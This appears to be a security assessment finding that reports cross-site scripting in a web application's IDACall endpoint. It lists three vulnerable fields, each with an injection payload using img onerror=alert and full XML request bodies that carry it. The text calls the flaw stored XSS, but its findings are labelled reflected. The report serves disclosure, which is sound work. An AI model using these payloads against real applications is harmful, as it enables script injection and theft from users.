Potential impact:
Perform client-side attacks against the users of the web application. An attacker could inject malicious JavaScript code to steal user credentials, steal sensitive data, perform crypto-mining activities, implement a key logger, or build an XSS worm.
Description:
Stored XSS (also known as persistent) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.
We have detected several user inputs that are not sanitized properly, which makes it possible for an attacker to execute JavaScript code in the user's browser.
Reflected Cross Site Scripting 1:
These are the details of the injection point:
URL: https://<host>:6443/bimft/isomorphic/IDACall
Field: methodName
Payload: '</TEXTAREA > <img src=x onerror=alert('boehringer')><TEXTAREA>
<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchemainstance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID>isc_builtin</appID><className>builtin</className><methodName>'</TEXTAREA><img src=x onerror=alert('RedTeam')><TEXTAREA></methodName><is_ISC_RPC_DMI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI></elem></operations></transaction>
Reflected Cross Site Scripting 2:
These are the details of the injection point:
URL: https://<HOST>:6443/bimft/isomorphic/IDACall
Field: appID
Payload: </TEXTAREA > <img src=x onerror=alert('RedTeam')><TEXTAREA>
<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchemainstance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID> </TEXTAREA><img src=x onerror=alert('RedTeam')><TEXTAREA></appID><className>builtin</className><methodName>loadFile</methodName><is_ISC_RPC_DMI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI></elem></operations></transaction>
Reflected Cross Site Scripting 3:
These are the details of the injection point:
URL: https://<HOST>:6443/bimft/isomorphic/IDACall
Field: isc_dd
Payload: ';</script><img+src=""+onerror=alert("RedTeam")><script>var+a='
In all the cases, an Alert pop-up is triggered by exploiting the vulnerability:
Triggering Alert pop-up
See the attachment for the popup triggered.